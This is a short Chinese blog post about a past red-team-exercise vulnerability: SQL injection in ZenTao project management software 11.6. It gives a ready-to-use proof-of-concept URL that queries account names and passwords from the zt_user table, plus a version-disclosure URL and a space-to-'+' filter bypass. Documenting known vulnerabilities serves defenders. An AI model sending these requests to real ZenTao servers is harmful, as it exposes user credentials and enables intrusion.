往期hvv高危漏洞——禅道项目管理软件11.6 SQL注入漏洞 - 大道至理 - 博客园

一切，都是最好的安排。
可以选择接受，或者笑着接受。
☻

往期hvv高危漏洞——禅道项目管理软件11.6 SQL注入漏洞

本文参考链接

https://www.freebuf.com/vuls/358189.html

Poc

http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc之读取版本信息

http://localhost:8084/zentaopms11.6/www/index.php?mode=getconfig

漏洞成因：

SQL语句执行前，过滤不严格。

绕过方式：

将 “空格” 替换为 “+” 即可。

详情可参考“本文参考链接”。

posted on 2024-06-06 18:21 大道至理阅读(5) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

导航

公告